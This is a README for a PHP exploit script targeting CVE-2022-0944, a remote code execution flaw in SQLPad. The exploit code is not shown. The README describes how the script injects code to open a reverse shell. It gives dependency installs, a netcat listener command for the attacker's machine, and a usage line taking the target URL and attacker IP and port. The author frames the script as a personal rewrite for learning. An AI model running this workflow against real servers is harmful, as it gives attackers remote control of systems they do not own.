This PHP code is designed to exploit a Remote Code Execution (RCE) vulnerability in SQLPad, related to CVE-2022-0944.
It works by injecting malicious code into the SQLPad application, forcing it to execute a system command that opens a reverse shell – a connection that grants the attacker remote control of the vulnerable system.
- PHP CLI:
    sudo apt-get install php-cli
- cURL (PHP cURL library):
    sudo apt-get install php-curl
To capture the reverse shell connection, start Netcat on the attacker’s machine:
    nc -lvnp 4444

    php exploit.php <root_url> <attacker_ip> <attacker_port>

- <root_url>: The root URL of the vulnerable SQLPad (e.g., http://target.com:3000)
- <attacker_ip>: The attacker’s IP address listening for the reverse connection (same as the Netcat IP)
- <attacker_port>: The port on which the attacker is listening (same as the Netcat port)
The original exploit logic was based on this repository:
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
My goal here was to understand the exploit logic and rewrite it in another programming language as a personal challenge.
Additional reference: 🔗 CVE-2022-0944 – NVD